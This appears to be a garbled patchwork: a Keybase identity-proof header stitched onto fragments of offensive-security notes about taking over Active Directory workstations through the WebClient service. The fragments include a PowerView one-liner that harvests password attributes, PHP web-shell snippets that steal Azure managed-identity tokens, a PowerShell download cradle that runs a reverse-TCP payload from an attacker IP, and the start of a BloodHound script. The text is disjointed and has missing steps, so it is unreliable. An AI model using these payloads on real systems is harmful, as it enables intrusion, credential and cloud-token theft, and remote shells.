I hereby claim:
- I am c0axx on github.
- I am c0axx (https://keybase.io/c0axx) on keybase.
- I have a public key ASCQzho6XeMDopSCjSDM6aK-1ZgLmvNSEWiFP0b3BwHI-Ao
To claim this, I am signing this object:
In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely, which I cover in a section below.
$users = Get-NetUser; $props=@(); $users | Get-Member | foreach-object{if($_.Name -notlike "badpassword*"){$props+=$_.Name}}; foreach($user in $users){ foreach($prop in $props){ if($user.$prop -like "*password*" -and $user.$prop -notlike "*dont_expire_password" -and $user.$prop -notlike "*RODC Password*"){Write-Output ($user.samAccountName + "[" + $prop + "]" + " : " + $user.$prop) } } }
<?php
system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');
?>
<?php
system('curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');
?>
<?php
system('curl "$IDENTITY_ENDPOINT?resource=https://graph.windows.net/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');
?>
Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15 Edg/100.0.4896.127
iex (New-Object Net.Webclient).downloadstring("http://10.0.10.X/reversetcp.ps1")
Invoke-PowerShellTcp -Reverse -IPAddress 10.0.10.X -Port 8888
#!/usr/bin/env bash
set -o errexit
set -o nounset
set -o pipefail
echo "[*] Creating temporary directory..."
TMPDIR="$(mktemp -d --suffix=_bloodhound-customqueries)"
# Compass BloodHound Customqueries